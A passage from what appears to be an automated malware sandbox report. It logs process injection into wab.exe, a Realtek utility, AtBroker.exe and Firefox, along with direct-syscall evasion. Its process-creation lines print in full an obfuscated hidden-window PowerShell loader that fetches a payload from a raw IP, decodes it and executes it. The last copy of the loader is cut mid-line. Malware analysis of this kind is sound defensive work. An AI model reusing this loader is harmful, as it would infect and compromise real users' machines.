Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov ecx, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov ecx, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23311514 mov eax, dword ptr fs:[00000030h] 12_2_23311514
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337C51D mov eax, dword ptr fs:[00000030h] 12_2_2337C51D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB502 mov eax, dword ptr fs:[00000030h] 12_2_232EB502
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F2500 mov eax, dword ptr fs:[00000030h] 12_2_232F2500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h] 12_2_2331E507
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332C50D mov eax, dword ptr fs:[00000030h] 12_2_2332C50D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332C50D mov eax, dword ptr fs:[00000030h] 12_2_2332C50D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330C560 mov eax, dword ptr fs:[00000030h] 12_2_2330C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB55F mov eax, dword ptr fs:[00000030h] 12_2_233CB55F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB55F mov eax, dword ptr fs:[00000030h] 12_2_233CB55F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F254C mov eax, dword ptr fs:[00000030h] 12_2_232F254C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BA553 mov eax, dword ptr fs:[00000030h] 12_2_233BA553
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23326540 mov eax, dword ptr fs:[00000030h] 12_2_23326540
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330E547 mov eax, dword ptr fs:[00000030h] 12_2_2330E547
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233785AA mov eax, dword ptr fs:[00000030h] 12_2_233785AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F45B0 mov eax, dword ptr fs:[00000030h] 12_2_232F45B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F45B0 mov eax, dword ptr fs:[00000030h] 12_2_232F45B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23322594 mov eax, dword ptr fs:[00000030h] 12_2_23322594
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A580 mov eax, dword ptr fs:[00000030h] 12_2_2332A580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A580 mov eax, dword ptr fs:[00000030h] 12_2_2332A580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF582 mov eax, dword ptr fs:[00000030h] 12_2_233AF582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E588 mov eax, dword ptr fs:[00000030h] 12_2_2336E588
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E588 mov eax, dword ptr fs:[00000030h] 12_2_2336E588
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337C5FC mov eax, dword ptr fs:[00000030h] 12_2_2337C5FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h] 12_2_232FB5E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A5E7 mov ebx, dword ptr fs:[00000030h] 12_2_2332A5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332A5E7 mov eax, dword ptr fs:[00000030h] 12_2_2332A5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233215EF mov eax, dword ptr fs:[00000030h] 12_2_233215EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233265D0 mov eax, dword ptr fs:[00000030h] 12_2_233265D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h] 12_2_232EF5C7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x6E6A609
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtSetInformationProcess: Direct from: 0x77A32B7C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtOpenFile: Direct from: 0x77A32CEC
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtSetInformationThread: Direct from: 0x77A26319
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtQueryInformationToken: Direct from: 0x77A32BCC
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtAllocateVirtualMemory: Direct from: 0x77A33BBC
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtTerminateThread: Direct from: 0x77A32EEC
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x6E6431B
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtClose: Direct from: 0x7FFB5E559E7F
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtNotifyChangeKey: Direct from: 0x77A33B4C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtMapViewOfSection: Direct from: 0x77A32C3C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtAllocateVirtualMemory: Direct from: 0x77A32B1C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtResumeThread: Direct from: 0x77A335CC
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtQuerySystemInformation: Direct from: 0x77A32D1C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtClose: Direct from: 0x77A32A8C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtCreateKey: Direct from: 0x77A32B8C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtSetInformationThread: Direct from: 0x77A32A6C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtQueryAttributesFile: Direct from: 0x77A32D8C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtDelayExecution: Direct from: 0x77A32CFC
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtOpenKeyEx: Direct from: 0x77A32ABC
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtQueryInformationProcess: Direct from: 0x77A32B46
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtProtectVirtualMemory: Direct from: 0x7FFB92E02651
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtProtectVirtualMemory: Direct from: 0x77A32EBC
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtCreateFile: Direct from: 0x77A32F0C
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtDelayExecution: Direct from: 0x6E6414C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtQuerySystemInformation: Direct from: 0x77A347EC
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtDeviceIoControlFile: Direct from: 0x77A32A0C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtOpenSection: Direct from: 0x77A32D2C
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe NtAllocateVirtualMemory: Direct from: 0x77A32B0C
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe NtResumeThread: Direct from: 0x6E64392
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe protection: read write
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread register set: target process: 7544
Source: C:\Windows\SysWOW64\AtBroker.exe Thread register set: target process: 7912
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3080000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 307FF98
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. 
') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. 
') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe" Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. 
